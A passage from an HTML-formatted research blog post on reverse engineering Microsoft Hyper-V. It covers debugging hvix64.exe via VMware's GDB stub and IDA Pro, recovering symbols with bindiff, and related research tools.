font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Close hvloader.dll database and open hvix64.exe database, attach it to VMware GDB stub. Launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RebaseHVGdb2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script, then </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RestoreHvix64_2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, which is return early replacing instruction</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We are inside hvix64.exe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 227px; overflow: hidden; width: 256px;"><img height="227" src="https://lh4.googleusercontent.com/areYGuRRAT-J2x9f-kzLhTY43SZDVQD7lGsBSono66YCzqoMql-4A0qi3690C5JI4jH0bpxTmzUYQAP9eDazE8BlNTCy9fVAFf8JrXc8y4B5_X18FWVUwI-YXmJb0uL8XYO4HZDOSJN9vZvAVw" style="margin-left: 0px; margin-top: 0px;" width="256" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 180px; overflow: hidden; width: 587px;"><img height="180" src="https://lh3.googleusercontent.com/I4LU09G58ntxe142ZCaOPKg2xYTOaVxoD_wqvSNn4SazB-QErK4amnWLQmauBSUthQd2V6T0qHBiID_WJ5absoHk7st1O6MCJXiwP6o89u0fg3jl9heQZ8-LdAy-u5PsWBG-_FK0STWWa_Y6nw" style="margin-left: 0px; margin-top: 0px;" width="587" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 94px; overflow: hidden; width: 501px;"><img height="94" src="https://lh3.googleusercontent.com/RaOUogTmtPkMWb4v20YzOjfvq1aYlLA63xwF73Ufe5fuLxEsPnz4eQ-PjIQ-6dfFzwTZlup3pt0H7rW1v9kTfr6aTGm8w6MrMAAuIrbEQTdzggYjOWXNcRua_KprZuPXUgBq0eL741nS6j9OVg" style="margin-left: 0px; margin-top: 0px;" width="501" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmlaunch</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> we return back to hvloader.dll and next to winload.efi.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 218px; overflow: hidden; width: 315px;"><img height="218" src="https://lh3.googleusercontent.com/a7IpQju-XBlQBXx0ziGkT-Dvzo5c4SAHJbggOTik8vVkwSK3NCY0R-isbxAVx1rVTiKceiRYmsGvN_tNQZden9-DpOaubKrzi8RvvgUjab_EUxPBGypDDIczjty9wPUOGX-0Ig4BopdaXgllqA" style="margin-left: 0px; margin-top: 0px;" width="315" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you want debug OS loader simply don’t patch hvix64.exe and set breakpoint on instructions after vm_exit (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov eax, 1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, for example).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Old ida-python scripts was modified for debugging simplifications. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1_PatchHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2_RestoreHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3_PatchHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4_RebaseHVGdb2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5_RestoreHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Shortly, if you want debug hvix64.exe module using GDB, you need:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start VMware in GDB debugging mode – you stopped on BIOS initialization block</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">attach IDA PRO with winload.efi to GDB and make breakpoint to instruction, which make calling of hvloader!HvlLaunchHypervisor </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">press F9</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 1_PatchHvLoader2019.py through IDA.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">detach IDA PRO with winload.efi and attach IDA PRO with hvloader.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 2_RestoreHvLoader2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">make breakpoint on instruction, that jump inside hypervisor (jmp r8)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 3_PatchHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">detach IDA PRO with hvloader.dll and attach IDA PRO with hvix64.exe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 4_RebaseHVGdb2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run 5_RestoreHvix64_2019.py</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that you can debug hvix64.exe from start+0x7A offset.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Need to mention, that hypervisor loading process in Windows Server 2012 (and higher) significantly differs from Windows Server 2008 R2, where preparation and launch of hypervisor directly produced by hvboot.sys, that run after Windows kernel loading. The activation of the hypervisor through instruction </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmlaunch</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, performed in hvboot.sys and next VM exit was processed in the hvix64.exe.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Find symbolic information</span></h1><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Many of Hyper-V components have public symbols since 2018. At the time of publication only hvix64.exe, hvax64.exe and hvaa64.exe with hvloader.dll haven’t symbols. Latest hvloader.exe\efi and hvloader.dll symbols can be loaded for modules, compiled before 03.2018 (I used hvloader.dll symbols from Windows 10, build 17115, build date – 03.03.2018).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When loading hvix64.exe in IDA PRO we get about four thousand functions with names like sub_FFFFF8000XXXXX because Microsoft, unfortunately, does not provide the symbol information for the hypervisor. Facilitate the research of the hypervisor can first try to identify some of the functions without detailed study.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the first place it is worth using bindiff (or diaphora) to compare the files hvix64, hvloader and winload where symbol information are provided. Comparison shows that the networking function (e1000), USB, cryptography and some other features are exactly the same as the ones that are present in winload.exe (in Windows Server 2019 and Windows 10 Hyper-V debugging and network driver’s functions have been moved to separate modules, f.e. bootlib.dll). This will help set the appointment of 500 functions. The same bindiff allows you to move the names of matching functions from one database to another idb. However, this method should be taken with caution and do not move all fully matched functions. At least the result should be analyzed by Visual comparison graph matching functions (Ctrl + E).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, let's define exception/interrupt functions, which are standard for processor architecture x86. A little script is written in python (ParseIDT.py) to parse the IDT, which must be run in IDA PRO, being connected through a debugging module of WinDBG to the hypervisor.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the case of ISR was not found, check the tab List of problems in IDA PRO, since these procedures can not be found in the automatic analysis code that IDA performs.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, you can define the exit procedure in VM after reading field values VMCS. This can be done after the procedure fill the VMCS at hvix64.exe or use this script display-vmcs.py, which in the context of the hypervisor reads all fields VMCS and prints their values.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is good ida-python scripts from Behrooz Abbassi (@rceninja): ia32_msr_decoder.py and IA32_VMX_Helper.py. You can apply it and get symbolic MSR and VMCS fields names inside IDA database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Good news, that hypervisor symbols for hvix64.exe, hvax64.exe, hvboot.sys from Windows Server 2008 are presented. Bad news, that Windows Server 2008 is not updated and doesn’t have many of new Hyper-V features. But you can learn basic Hyper-V mechanism and hypercalls realization in comparing with Hyper-V TLFS 1.0.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Very good header file hvgdk.h, containing actual information about Hyper-V, was done by Alex Ionescu (@aionescu):</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://ionescu007.github.io/hdk" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://ionescu007.github.io/hdk</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It contains actual information on article publication time.</span></p><p class="MsoNormal" style="text-align: justify; text-indent: 35.4pt;"><span lang="EN-US" style="font-size: 9pt; line-height: 107%; mso-ansi-language: EN-US;">Also,
you can see information from Windows SDK WHVP API header files:<o:p></o:p></span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvEmulation.h<o:p></o:p></span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvPlatform.h<o:p></o:p></span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span lang="EN-US" style="font-size: 9pt; mso-ansi-language: EN-US;">WinHvPlatformDefs.h<o:p></o:p></span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; text-indent: 47.2px;"><span style="font-size: 9pt; text-indent: 35.4pt;">but now they contain description only for WinHvPlatform.dll and </span><span style="font-size: 12px; text-align: left;">WinHvEmulation.dll </span><span style="font-size: 9pt; text-indent: 35.4pt;">libraries.</span></p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; margin-left: 35.45pt; margin-right: 0cm; margin-top: 0cm; margin: 0cm 0cm 0cm 35.45pt; text-align: justify; text-indent: 35.45pt;"><span style="font-size: 9pt; text-indent: 35.45pt;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Tools</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Many tools was developed during this years. I am not describing Sysinternals Suite, because it is standard for Windows researching without kernel or usermode debugging.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interesting set of tools from Pavel Yosifovich (@zodiacon). It looks like Sysinternals Suite tools, but has source code). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ETWProvider – you can see all ETW providers, loaded by Hyper-V components in runtime.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 